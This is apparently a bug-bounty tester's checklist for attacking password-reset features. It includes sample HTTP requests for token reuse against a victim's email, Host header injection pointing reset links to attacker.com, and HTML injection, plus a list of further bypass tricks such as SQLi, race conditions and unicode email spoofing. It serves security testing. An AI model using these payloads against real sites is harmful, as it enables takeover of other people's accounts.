reset_password_checklist

[ ] a lot of ideas in this article by omer hesham

https://medium.com/bugbountywriteup/hubspot-full-account-takeover-in-bug-bounty-4e2047914ab5

[ ] Use Your Token on Victims Email

POST /reset
...
...
email=victim@gmail.com&token=$YOUR-TOKEN$

[ ] Host Header Injection

POST /reset
Host: attacker.com
...
email=victim@gmail.com

[ ] HTML injection in Host Header

POST /reset
Host: attacker">.com
...
email=victim@gmail.com

[ ] Leakage of Password reset in Referer Header

Referrer: https://website.com/reset?token=1234

[ ] Using Companies Email

[ ] CRLF in URL

[ ] HTML injection in Email

[ ] Remove token

[ ] Change it to 0000

[ ] Use Null Value

[ ] try an array of old tokens

[ ] SQLi bypass

[ ] Request Method / Content Type

[ ] Response Manipulation

[ ] Massive Token

[ ] Crossdomain Token Usage

[ ] Leaking Reset Token in Response Body [ ] change 1 char at the begin/end to see if the token is evaluated [ ] use unicode char jutzu to spoof email address [ ] look for race conditions [ ] try to register the same mail with different TLD (.eu,.net etc)